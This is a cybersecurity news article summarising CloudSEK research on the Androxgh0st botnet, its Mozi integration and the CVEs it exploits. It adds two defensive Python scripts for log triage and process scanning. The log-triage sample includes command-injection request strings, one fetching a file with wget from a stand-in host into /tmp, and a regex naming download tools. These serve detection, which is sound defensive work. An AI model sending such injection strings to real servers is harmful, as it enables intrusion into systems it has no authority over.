
CloudSEK Uncovers Enhanced Androxgh0st Botnet with Mozi Botnet Integration and Expanded Vulnerability Exploitation

More Problems Uncovered in Latest Research

CloudSEK’s Threat Research team has discovered substantial advancements in the Androxgh0st botnet, revealing that it now exploits a broader range of vulnerabilities across major technologies and integrates components of the infamous IoT-focused Mozi botnet.

Active since January 2024, Androxgh0st initially targeted web servers. However, CloudSEK’s recent analysis of its command and control (C2) logs shows a pivot in tactics, indicating deployment of Mozi payloads and targeting IoT devices, further amplifying its threat profile. (For more information, check the full report.)

Key Findings from CloudSEK’s Research

  • Mozi Botnet Integration. Mozi, primarily known for infecting IoT devices such as Netgear and D-Link routers, was thought dormant following a killswitch activation in 2021. However, Androxgh0st’s C2 infrastructure is now deploying Mozi’s IoT payloads, leveraging its propagation capabilities to expand Androxgh0st’s reach. This operational integration suggests a shift towards a unified botnet infrastructure, with Androxgh0st gaining Mozi’s specialized IoT infiltration tactics.
  • Expanded Vulnerability Exploitation. Recent activity shows that Androxgh0st now exploits critical vulnerabilities across a wide spectrum of applications, including:
    • Cisco ASA: Exploits XSS vulnerabilities to inject web scripts via unspecified parameters.
    • Atlassian JIRA: Uses path traversal (CVE-2021-26086) to access sensitive files.
    • PHP Frameworks: Targets Laravel (CVE-2018-15133) and PHPUnit (CVE-2017-9841), allowing backdoor access to compromised systems.
    • New Vulnerabilities: CVE-2023-1389 in TP-Link Archer AX21 firmware (unauthenticated command execution) and CVE-2024-36401 in GeoServer (remote code execution) have also been exploited, showing that Androxgh0st adapts to newer CVEs and keeps adding fresh targets to an already extensive arsenal. (For more information, check the full report.)
  • Attack Methods and Persistence Tactics: CloudSEK’s command and control analysis indicates Androxgh0st actively deploys brute-force credential stuffing, command injection, file inclusion, and malware propagation. By leveraging Mozi’s IoT capabilities, Androxgh0st now exploits misconfigured routers and devices across a vast geographical range, infecting devices in Asia, Europe, and beyond.

Impact and Security Recommendations from CloudSEK

Androxgh0st’s integration of Mozi and new exploit techniques marks a notable escalation in botnet behavior, impacting web applications and IoT devices on a global scale. Organisations should adopt the following security measures:

  1. Immediate Patching. Apply patches for vulnerabilities exploited by Androxgh0st, particularly on Cisco ASA, TP-Link, Atlassian JIRA, PHP frameworks, and routers.
  2. Monitor Network Traffic. Track suspicious outbound connections and anomalous login attempts, especially from IoT devices vulnerable to Androxgh0st-Mozi collaboration.
  3. Log Analysis. Review HTTP and web server logs for signs of compromise, including suspicious GET or POST requests that suggest command injections, particularly targeting paths such as /cgi-bin/admin.cgi and /setup.cgi.
  4. Enhanced Endpoint Detection. Use EDR tools to detect unauthorised processes, especially those running from directories such as /tmp and /dev/shm, which Androxgh0st commonly uses for staging and persistence.
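Recommendations 2 and 3 above (anomalous login attempts, and suspicious GET or POST requests to paths such as /cgi-bin/admin.cgi and /setup.cgi) can be turned into a first-pass log triage script. The Python below is an added example written for this page; it is not CloudSEK's tooling and does not come from the report. It assumes the Apache/nginx "combined" access-log format, runs over constructed sample lines, and its login paths, failure threshold, injection-pattern regex and the PHPUnit request path associated with CVE-2017-9841 are this example's own assumptions rather than indicators published on the page.

```python
"""First-pass triage of web-server access logs for the request patterns the
CloudSEK Androxgh0st advisory points at. Added example; the log lines below
are constructed, and the detection rules are assumptions, not published IoCs."""
import re
from collections import Counter
from urllib.parse import unquote

# Apache/nginx "combined" log format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+'
)

# Request paths the advisory names as targets of command-injection attempts.
WATCHED_PATHS = ("/cgi-bin/admin.cgi", "/setup.cgi")
# Well-known request path for PHPUnit CVE-2017-9841 (assumption: not quoted on the page).
PHPUNIT_PATH = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"

# Shell metacharacters, download/staging commands, the staging directories the
# advisory mentions, and parameter names that often carry a command (assumption).
INJECTION_RE = re.compile(
    r"(;|\|\||&&|`|\$\()|\b(wget|curl|chmod|nohup)\b|/tmp/|/dev/shm/|\b(cmd|command|exec)=",
    re.I,
)

LOGIN_PATHS = ("/login", "/wp-login.php", "/api/login")  # assumption: site-specific
BRUTE_FORCE_THRESHOLD = 5                                # assumption: failures per IP


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    # Decode %xx escapes so encoded payloads (e.g. %20, %3B) are inspected in clear.
    entry["target"] = unquote(entry["target"])
    entry["path"] = entry["target"].partition("?")[0]
    return entry


def classify(entry):
    """Return the list of detection tags for one parsed entry (empty if benign)."""
    tags = []
    if entry["path"] in WATCHED_PATHS or entry["path"].endswith(PHPUNIT_PATH):
        tags.append("watched-path")
    if INJECTION_RE.search(entry["target"]):
        tags.append("injection-pattern")
    return tags


def analyze(lines):
    """Return alerts as (ip, method, target, tags) tuples. Per-request alerts come
    first, in log order; brute-force alerts (repeated 401/403 on login paths) last."""
    alerts = []
    login_failures = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # unparsable line: skipped here, worth counting in production
        tags = classify(entry)
        if tags:
            alerts.append((entry["ip"], entry["method"], entry["target"], tags))
        if entry["path"] in LOGIN_PATHS and entry["status"] in (401, 403):
            login_failures[entry["ip"]] += 1
    for ip, count in login_failures.items():
        if count >= BRUTE_FORCE_THRESHOLD:
            alerts.append((ip, "-", "-", [f"login-failures:{count}"]))
    return alerts


# Constructed sample log (TEST-NET addresses); the last six lines simulate a
# credential-stuffing burst against /login.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Nov/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [04/Nov/2024:10:00:02 +0000] "GET /cgi-bin/admin.cgi?cmd=uname%20-a HTTP/1.1" 404 201',
    '203.0.113.7 - - [04/Nov/2024:10:00:03 +0000] "POST /setup.cgi HTTP/1.1" 200 88',
    '203.0.113.9 - - [04/Nov/2024:10:00:04 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0',
    '203.0.113.11 - - [04/Nov/2024:10:00:05 +0000] "GET /search?q=foo;wget%20http://198.51.100.3/x%20-O%20/tmp/x HTTP/1.1" 200 120',
] + [
    f'198.51.100.20 - - [04/Nov/2024:10:01:{i:02d} +0000] "POST /login HTTP/1.1" 401 0'
    for i in range(6)
]

if __name__ == "__main__":
    for ip, method, target, tags in analyze(SAMPLE_LOG):
        print(f"[!] {ip} {method} {target} -> {', '.join(tags)}")
```

Two caveats matter when running this against real logs. Access logs do not record POST bodies, so an injection carried in the body of a request to /setup.cgi is visible only as the request to that path; the script therefore flags watched paths regardless of status code, and a 404 on /cgi-bin/admin.cgi is still worth recording because it shows the host is being scanned. The brute-force rule counts failures per source IP only, so distributed attempts from many addresses need a per-account counter as well.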
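Recommendation 4 above (unauthorised processes executing from /tmp or /dev/shm) can be spot-checked on a Linux host without an EDR agent by reading /proc. The script below is an added example written for this page, not CloudSEK's tooling; it assumes a Linux /proc filesystem, and treating a " (deleted)" suffix on the resolved executable as suspicious is this example's own rule.

```python
"""Spot-check running processes for executables living in world-writable staging
directories (/tmp, /dev/shm). Added example; reads /proc on Linux."""
import os

# Directories the advisory names as common staging/persistence locations.
STAGING_DIRS = ("/tmp", "/dev/shm")


def is_staging_exe(exe_path):
    """True if the resolved executable path sits under a staging directory.
    The kernel appends ' (deleted)' when the binary was unlinked after launch,
    a common way to hide a dropped payload, so that case is flagged regardless
    of directory (this example's own rule)."""
    if exe_path.endswith(" (deleted)"):
        return True
    norm = os.path.normpath(exe_path)
    return any(norm == d or norm.startswith(d + os.sep) for d in STAGING_DIRS)


def scan_proc(proc_root="/proc"):
    """Return [(pid, exe_path, cmdline)] for processes whose executable is
    suspicious. Entries whose /proc/<pid>/exe cannot be read (other users'
    processes without root, kernel threads) are skipped."""
    findings = []
    if not os.path.isdir(proc_root):
        return findings
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        pid_dir = os.path.join(proc_root, name)
        try:
            exe = os.readlink(os.path.join(pid_dir, "exe"))
        except OSError:
            continue
        if not is_staging_exe(exe):
            continue
        try:
            with open(os.path.join(pid_dir, "cmdline"), "rb") as f:
                raw = f.read()
        except OSError:
            raw = b""
        # cmdline is NUL-separated; render it as one readable line.
        cmdline = raw.replace(b"\0", b" ").decode(errors="replace").strip()
        findings.append((int(name), exe, cmdline))
    return findings


if __name__ == "__main__":
    for pid, exe, cmd in scan_proc():
        print(f"[!] pid {pid}: {exe}  ({cmd})")
```

Run it as root to see every user's processes; an unprivileged run only reports the caller's own. The " (deleted)" case is the one most often missed by a plain directory listing, since the file is already gone from /tmp while the process keeps running from the unlinked inode.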

CSA Editorial

CSA was launched in Jan 2018 in partnership with Cyber Security Malaysia (an agency under MOSTI). CSA is a news and content platform focusing on key issues in cybersecurity in the region, serving cybersecurity professionals, IT professionals, risk professionals and C-level executives who have an obligation to understand the impact of cyber threats.
